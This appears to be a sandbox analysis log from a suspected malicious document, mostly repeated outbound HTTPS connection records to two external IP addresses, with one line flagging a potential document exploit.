Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
